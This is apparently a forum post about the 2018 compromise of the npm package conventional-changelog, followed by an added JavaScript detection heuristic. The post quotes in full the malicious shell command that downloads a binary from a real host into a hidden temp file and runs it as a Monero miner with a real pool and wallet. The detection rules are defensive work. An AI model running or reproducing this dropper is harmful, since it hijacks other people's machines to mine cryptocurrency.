NPM: conventional-changelog package hacked

github.com

2 points by feduzi 8 years ago · 1 comment

feduziOP 8 years ago

Some details (https://github.com/conventional-changelog/conventional-chang...):

> This happened because of a security issue: conventional-changelog package was hacked, and it contained a Monero miner.

> I reported it to the devs and they unpublished it (and also conventional-changelog-preset-loader).

> They should re-add a safe version tagged with 1.1.3 to fix this issue.

The hacked package executes:

rm -rf /tmp/.debug && curl https://mnrlnt.blob.core.windows.net/mnr/Silence -o /tmp/.debug 2> /dev/null && chmod +x /tmp/.debug && /tmp/.debug -o stratum+tcp://pool.minexmr.com:4444 -u 4A9V5knGUM8PUdPSJbTox8b9mgTsfXByK49XKtEyqVayDxD6CFJe5dsexaM99x7MXFNTxZkYAr4YtcAXQMkNrFjnRPJGJFr.JL6_$(hostname -f | md5sum | cut -c1-8) -p x -t $(lscpu | grep 'CPU(s)'| grep -v ',' | awk '{print $2}' | head -n 1) 2> /dev/null &
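
A detection sketch for the behaviour chain in the command quoted above (download to a temp path, mark it executable, run it against a stratum pool, silence and background it). This is an added example, not part of the original comment or of the conventional-changelog project; the rule names, `scanCommand`, and the sample command lines (placeholder hosts and wallet) are constructed for illustration, and it assumes you already collect command lines from process-execution logs or similar.

```javascript
// Heuristic rules, one per behaviour visible in the quoted command.
// Each is a weak signal alone; the combination is what matters.
const TMP = String.raw`\/(?:tmp|var\/tmp|dev\/shm)\/`;
const RULES = [
  // curl/wget writing its output into a world-writable temp directory
  { id: 'download-to-tmp', re: new RegExp(String.raw`\b(?:curl|wget)\b[^|;&]*\s-[oO]\s*${TMP}\S+`) },
  // chmod +x (or an octal mode with an execute bit) on a temp-directory file
  { id: 'chmod-exec-tmp', re: new RegExp(String.raw`\bchmod\s+(?:\+x|[0-7]*[1357][0-7]*)\s+${TMP}\S+`) },
  // mining-pool endpoint passed on the command line
  { id: 'stratum-pool', re: /stratum\+(?:tcp|ssl):\/\/[\w.-]+:\d+/i },
  // dot-prefixed (hidden) file directly under /tmp
  { id: 'hidden-tmp-file', re: /\/tmp\/\.[\w.-]+/ },
  // stderr discarded and the job pushed to the background
  { id: 'silenced-background', re: /2>\s*\/dev\/null\s*&\s*$/ },
];

// The three rules that together describe "fetch, make executable, mine".
const CHAIN = ['download-to-tmp', 'chmod-exec-tmp', 'stratum-pool'];

function scanCommand(cmd) {
  const hits = RULES.filter((r) => r.re.test(cmd.trim())).map((r) => r.id);
  const chain = CHAIN.every((id) => hits.includes(id));
  const verdict = chain ? 'miner-dropper' : hits.length > 0 ? 'review' : 'clean';
  return { hits, verdict };
}

// Constructed sample command lines (hosts and wallet are placeholders).
const SAMPLES = [
  'rm -rf /tmp/.debug && curl https://host.example.invalid/mnr/payload -o /tmp/.debug 2> /dev/null ' +
    '&& chmod +x /tmp/.debug && /tmp/.debug -o stratum+tcp://pool.example.invalid:4444 ' +
    '-u WALLET_PLACEHOLDER -p x 2> /dev/null &',
  'curl -sSf https://registry.example.invalid/pkg.tgz -o /tmp/pkg.tgz && tar -xzf /tmp/pkg.tgz',
  'node ./scripts/build.js',
];

for (const cmd of SAMPLES) {
  const { hits, verdict } = scanCommand(cmd);
  console.log(`${verdict.padEnd(14)} [${hits.join(', ')}] ${cmd.slice(0, 60)}`);
}
```

A lone `download-to-tmp` hit is common in legitimate installers, which is why it only rates `review`; the verdict escalates when the download, the chmod and the pool URL appear in the same command line.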
